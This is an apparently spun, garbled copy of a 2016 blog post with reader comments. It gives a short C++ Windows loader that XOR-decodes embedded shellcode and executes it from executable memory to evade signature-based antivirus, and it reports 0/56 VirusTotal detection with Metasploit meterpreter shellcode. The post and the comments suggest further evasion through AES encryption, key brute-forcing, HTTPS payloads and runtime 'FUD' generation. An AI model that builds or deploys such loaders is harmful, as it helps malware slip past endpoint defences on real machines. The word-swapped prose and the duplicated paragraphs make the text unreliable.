I had originally laid upwards out to write a long winded weblog postal service on unlike antivirus bypass techniques. I went through what was supposed to live footstep 1 of my guide together with uploaded my resultant binary to virustotal. To my consummate together with utter shock, the binary got a 0/56 detection rate. I decided to throw out my long winded thought together with motion frontward alongside this quick, dirty, together with unbelievably slowly method.
Quite simply, the to a higher house code creates a grapheme array alongside musical rhythm out code you lot tin add, performs an XOR functioning alongside the incredibly sophisticated key of lowercase 'x', allocates some memory, copies the grapheme array inwards said allocated memory, together with executes it. It may live worth highlighting that you lot volition need to XOR your shellcode alongside your key of choosing (in this instance 'x') earlier you lot set it inwards the to a higher house code together with compile.
So you lot are in all probability looking at that together with thinking 'really?' - I know how you lot feel. This is how I felt afterward I intended this to live footstep 1 of my tutorial together with I ran it through virustotal together with it returned 0/56 detection. I'd similar to stress that this is an incredible uncomplicated together with most basic technique, yet its success is soundless rather astonishing.
I originally wrote this instance together with tested it on virus total a field ago, but I did reanalyze the executable on virustotal at the fourth dimension of publishing this postal service together with works life it soundless had a 0 detection rate.
The binary you lot generate volition real probable non stand upwards for the SHA256 of the binary I receive got tested; the binary I uploaded contained shellcode generated alongside the metasploit framework.
I believe that most of my readers would concur alongside me that bypassing most antivirus based solutions is rather trivial, withal I do occasionally bump inwards to some people who only rely on tools that generate binaries that tin easily live fingerprinted together with flagged past times antivirus solutions. This article is largely intended for that audience.
Before I dive inwards to this modest tidbit of C++ code, I'd similar to acquit on a tool that is actually skillful at producing binaries that almost ever evade detection, Veil-Evasion (part of the Veil-Framework). This tool is awesome (many thank you lot to @harmj0y together with others for creating together with contributing to this awesome project) together with inwards almost all instances I receive got had to utilisation it has non permit me down. If it has, I blame people who maintain generating binaries together with so testing them on virustotal. If you lot people could halt doing that, that would live great.
At whatever rate, this begs the question, if tools similar Veil Evasion are so epic, why should you lot attention close knowing how to slap togother a binary alongside a shellcode payload yourself? Well at that topographic point are a number of reasons:
Before I dive inwards to this modest tidbit of C++ code, I'd similar to acquit on a tool that is actually skillful at producing binaries that almost ever evade detection, Veil-Evasion (part of the Veil-Framework). This tool is awesome (many thank you lot to @harmj0y together with others for creating together with contributing to this awesome project) together with inwards almost all instances I receive got had to utilisation it has non permit me down. If it has, I blame people who maintain generating binaries together with so testing them on virustotal. If you lot people could halt doing that, that would live great.
At whatever rate, this begs the question, if tools similar Veil Evasion are so epic, why should you lot attention close knowing how to slap togother a binary alongside a shellcode payload yourself? Well at that topographic point are a number of reasons:
- People instruct busy together with tools locomote deprecated
- The binaries generated past times tools locomote fingerprintable; non the payload necessarily, but the compiled construction of the binary.
- As a penetration tester, you lot should actually know how to do this. Ups your leet cred.. or so I hear.
Before you lot receive got a facial expression at the below code, it's worth noting that this is targeting the windows platform; equally manifestly noted alongside the reference to windows.h ;)
#include <windows.h> #include <iostream> int main(int argc, char **argv) { char b[] = {/* your XORd alongside key of 'x' shellcode goes hither i.e. 0x4C,0x4F, 0x4C */}; char c[sizeof b]; for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, c, sizeof c); ((void(*)())exec)(); } Quite simply, the to a higher house code creates a grapheme array alongside musical rhythm out code you lot tin add, performs an XOR functioning alongside the incredibly sophisticated key of lowercase 'x', allocates some memory, copies the grapheme array inwards said allocated memory, together with executes it. It may live worth highlighting that you lot volition need to XOR your shellcode alongside your key of choosing (in this instance 'x') earlier you lot set it inwards the to a higher house code together with compile.
So you lot are in all probability looking at that together with thinking 'really?' - I know how you lot feel. This is how I felt afterward I intended this to live footstep 1 of my tutorial together with I ran it through virustotal together with it returned 0/56 detection. I'd similar to stress that this is an incredible uncomplicated together with most basic technique, yet its success is soundless rather astonishing.
I originally wrote this instance together with tested it on virus total a field ago, but I did reanalyze the executable on virustotal at the fourth dimension of publishing this postal service together with works life it soundless had a 0 detection rate.
The binary you lot generate volition real probable non stand upwards for the SHA256 of the binary I receive got tested; the binary I uploaded contained shellcode generated alongside the metasploit framework.
Final Comments
Alright, so antivirus is dead. We all know that. That existence said, nosotros can't fence that over 95% of organizations are soundless depending on antivirus to protect endpoints.
Is at that topographic point a improve way? certainly. Influenza A virus subtype H5N1 number of vendors, which I shall non name, receive got launched products that receive got a novel approach to protecting endpoints primarily focusing on identification of known exploit techniques. This is unremarkably performed past times means of injecting DLLs inwards to processes that volition monitor for these known techniques together with foreclose the exploit from working successfully.
Is this fool proof technique? I would live inclined to say no. The bar volition live raised, but a novel type of truthful cat together with mouse game volition begin.
Final note: The to a higher house may non operate on _all_ antivirus solutions. I figure that was obvious, but thought I would bring upwards it earlier the pitch forks come upwards afterward me!
Edit (3/17/2016): Wow. This postal service blew upwards a lot to a greater extent than than I intended it to. Please acquit inwards heed that this article was targeted at penetration testers. The destination was to demonstrate an extremely simplistic signature based AV bypass technique. I didn't betoken out 'signature' equally I assumed it was obvious that heuristics capabilities would real probable pick this upwards - although it actually depends on your payload to a greater extent than than anything else. I don't advocate using this technique over infinitely to a greater extent than sophisticated implementations that tin live works life inwards Veil-Framework or Shellter. Think of the to a higher house code equally a template - instruct creative - brand the encoding routing to a greater extent than complicated - perchance implement encryption alongside key bruteforcing? so perchance add together some prime generation at the instruct locomote to throw off heuristics if you lot wishing to live fancy. Use payloads that communicate over HTTPS equally well. Sky's the restrain - this was exactly a super key example.
Final note: The to a higher house may non operate on _all_ antivirus solutions. I figure that was obvious, but thought I would bring upwards it earlier the pitch forks come upwards afterward me!
Edit (3/17/2016): Wow. This postal service blew upwards a lot to a greater extent than than I intended it to. Please acquit inwards heed that this article was targeted at penetration testers. The destination was to demonstrate an extremely simplistic signature based AV bypass technique. I didn't betoken out 'signature' equally I assumed it was obvious that heuristics capabilities would real probable pick this upwards - although it actually depends on your payload to a greater extent than than anything else. I don't advocate using this technique over infinitely to a greater extent than sophisticated implementations that tin live works life inwards Veil-Framework or Shellter. Think of the to a higher house code equally a template - instruct creative - brand the encoding routing to a greater extent than complicated - perchance implement encryption alongside key bruteforcing? so perchance add together some prime generation at the instruct locomote to throw off heuristics if you lot wishing to live fancy. Use payloads that communicate over HTTPS equally well. Sky's the restrain - this was exactly a super key example.
@@@@@@@@@@@@
53 comments :
- UnknownMarch 14, 2016 at 8:27 PMSo the shellcode you lot house inwards at that topographic point must live pre xor'ed alongside 'x' so that the code xor's it dorsum to usable shellcode right? Another obvious question, was the shellcode detectable earlier you lot exactly xor'ed it?Reply
- ....March 14, 2016 at 9:54 PMYes, absolutely. The shellcode must live pre XORd alongside the desired key. And yes, the shellcode I used was a measure meterpreter shellcode for contrary TCP that was non encoded alongside anything fancy. It was detected past times almost all AV on virustotal.
AnonymousMarch 17, 2016 at 1:51 AMThis works for balloon executables non exactly shellcode, together with why would anybody wants to protect shellcode into exe?
http://hackforums.net/showthread.php?tid=5197517
http://hackforums.net/showthread.php?tid=5168562
- AnonymousMarch 15, 2016 at 12:15 AMThe other vendor you lot speak close that does DLL injection -TRAPS... It only works on .pdf together with MS component filetypes. That's it! Influenza A virus subtype H5N1 instantly upwards .exe volition popular on their endpoint exactly the means you lot created this one.Reply
- ....March 15, 2016 at 5:36 AMThat is ane of them - but so is (for example) EMET together with it works on binaries. :) I'm non sure if that solution does to a greater extent than than pdf together with component filetypes, but I believe that it does.
Nathaniel ManziMarch 16, 2016 at 4:04 AMTraps works on binaries for exploit detection, I'm currently doing deployments together with testing together with tin vouch for this. Wildfire analyses unknown binaries together with tin live they tin live blocked past times default until a verdict is given.- AnonymousMarch 16, 2016 at 9:55 PMYou're assuming the cease betoken is on the network alongside Wildfire. What happens if it's a laptop off network? Also, my number alongside Wildfire AND Traps is that their vendor recommends you lot do application white-listing for it to work. I've been popping boxes left together with correct alongside Traps running, using basic Metasploit binaries. No detection. :-/
- Josh StoneMarch 15, 2016 at 12:26 AMIt's these footling moments that receive got convinced me that, equally the Symantec exec said famously, A/V is thoroughly dead. When the silliest things work, you lot know that the barrier of entry is depression plenty that anyone tin instruct in.Reply
My favorite ane is some of these network threat protection features that sentinel network connections together with do some "layer seven analysis". Send a payload, it kills the socket when it detects a meterpreter. So I made a shim together with custom stager that sends over 64k of random garbage, together with so sends the meterpreter payload. A/V gets tired easily, together with gives upwards every time.
A uncomplicated XOR is terrible crypto, but it's "good enough" because A/V isn't going to endeavor all XORs on every substring of every EXE to stand upwards for signatures. And fifty-fifty if it did, so do a two-byte XOR, etc. The showtime dominion of A/V bypass is to do something that you lot know A/V isn't willing to do.- AnonymousMarch 15, 2016 at 7:20 AMXOR isn't for encryption inwards this utilisation case, it's for obfuscation.
- AnonymousMarch 16, 2016 at 3:36 PMHay Josh, That audio sick. Is at that topographic point whatever means if you lot could explicate or demonstrate using an example? Really wanna endeavor this.
jérémie banierMarch 15, 2016 at 2:31 AMThat's pretty bad but since AV are signatures based this isn't totally unexpected (hence your research) but using a conduct based detection similar sandboxing or auditing this should live obvious, correct ? Any recommendations on a se-linux similar degree of audit for windows systems?- AnonymousMarch 15, 2016 at 5:40 AMSo the antivirus could non break anymore the payload because you lot encrypted it.Reply
Maybe I am existence silly, but it seems reasonable to me: Trying to do static anlysis of C code to position all the possible custom encryption mechanisms seems a difficult problem.- AnonymousMarch 15, 2016 at 9:47 AMYes but the betoken is that AV are useless. It's similar having a heavily reinforced steel door equally protection of which you lot tin exactly walk around to instruct in.
ReplyArtur KorobeynykMarch 15, 2016 at 6:33 AMThis is only a signature detection fail. VirusTotal does non include behavioral or heuristic scan, together with both volition exhibit that at that topographic point is something incorrect alongside this file. - AnonymousMarch 15, 2016 at 7:53 AMOne declaration for why maintain A/V around is that inwards real-world day-to-day operations inwards an organisation you lot soundless instruct many hits on your end-point devices from people who receive got tried to execute obvious together with good known malware.
So your less savvy users tend to instruct some assist from the A/V fifty-fifty though they should receive got caught the obvious inwards the showtime place. - AnonymousMarch 15, 2016 at 12:54 PMBecause ane time it starts to spread the A/V providers volition choose grip of air current of the novel binary together with so instruct the XOR'd binary's signature. Most companies receive got their A/V updated every few hours so within a twenty-four sixty minutes catamenia or so A/V volition choose grip of the binary. Thus begins a truthful cat together with mouse game of how fast tin folks supply malware together with how fast tin A/V choose grip of it.
This'll operate for directed attacks but non actually for hitting equally many hosts inwards the the world equally you lot can. - SilverWingedSeraphMarch 15, 2016 at 3:38 PMWhy not, then, receive got multiple (or hundreds) of versions, or locomote far polymorphic? Cracking XOR "encryption" is fast, uncomplicated give it a random, brusk key that has to live cracked.
AV engines volition either receive got to pass equally much fourth dimension equally you lot dandy the "encryption" on every unmarried file, or receive got hundreds? thousands? of signatures exactly for your malware. - ....March 15, 2016 at 4:23 PMThis was intended to exhibit a real uncomplicated together with key approach. You could absolutely implement AES, encrypt the shellcode alongside a uncomplicated key together with so embed a decryption routine within the binary that exactly animate existence forces itself. This, inwards my testing, has been effective against a number of heuristics based AV engines.
- AnonymousMarch 16, 2016 at 10:13 AMActually, most malware makers are making a shift towards generation fourth dimension fuds anyways. That's why there's a force for improve heuristics from anti-virus/anti-malware tools.
PS: generation-time fuds are almost a requirement now, but aren't reasonably considered fully undetectable (fud). It's possible to choose grip of them. But runtime fud applications volition live the best large push. Very few malware authors are doing this these days. Short together with sweet, wrapper tin live whatever -> code to run is generated at run fourth dimension -> runtime code is unique to the generation. This is the existent fud.
Also, don't tell people who purchase malware commercially of this problem. They powerfulness realize they're existence scammed alongside "___ RAT COMES WITH REAL FUD OPTIONS!"-type offers.
- AnonymousMarch 15, 2016 at 8:56 AMThank you lot for this article. I managed to instruct a measure metasploit shellcode loaded together with executed alongside the footling slice of C code you lot provided but I had to take the XOR decoding piece. The argue is: how do you lot xor encode alongside a key of your selection a shellcode ?Reply
I couldn't break a means to do it alongside msfvenom or Veil-Ordnance... - AnonymousMarch 15, 2016 at 11:16 AMThe skillful quondam Virustotal detection fallacy. You know Virustotal covers this inwards their About section?
https://www.virustotal.com/en/about/
Search for the keyword "BAD IDEA"- ....March 15, 2016 at 11:19 AMI receive got tested this approach manually on 10 AV solutions inwards my lab equally well.
Josh DustinMarch 16, 2016 at 10:23 AMVery nice, thank you lot for sharing. Looks similar your file is at nowadays at 1/56.Reply
https://www.virustotal.com/en/file/acf5823b5f7fa876a80ad696717b91331820a96c0cbf997bde1211602b2457fd/analysis/- AnonymousMarch 16, 2016 at 12:31 PMHi, I am wondering why your file was non picked upwards past times Virustotal afterward a calendar week or so went by? I thought files were checked past times the AV companies or something similar? So I am assuming that I am incorrect but idk. Please reply, thanks.Reply
- Rodrigo RuizMarch 16, 2016 at 1:09 PMIn las twelvemonth I published Apoc@lypse: The End of Antivirus. With ane delineate of piece of job nosotros tin do all antivirus kill itself.Reply
See Spring 2016 edition of Cyber Security Review. We tin baypass all AVjust using DOS within Windows. - AnonymousMarch 16, 2016 at 1:17 PMThank's for this brusk & interesting article.
I'm may live overestimating A/V but: Is they whatever conduct chances that an A/V performing some real-time analysis could abide by the "deciphered/clear" payload inwards retention (during memcpy or field calling "exec") ? - hvqzaoMarch 27, 2016 at 3:02 AMI've survive had some fourth dimension to essay it together with well... virustotal 13/57 together with instant detection inwards Windows 10. Repository: https://github.com/hvqzao/evadeav
- AnonymousJune 1, 2016 at 4:39 AMCreate a multibyte encoding version that soundless has a real depression detection charge per unit of measurement on VT (2/55) - PoC hither https://github.com/Arno0x/MultibyteEncodedShellcode
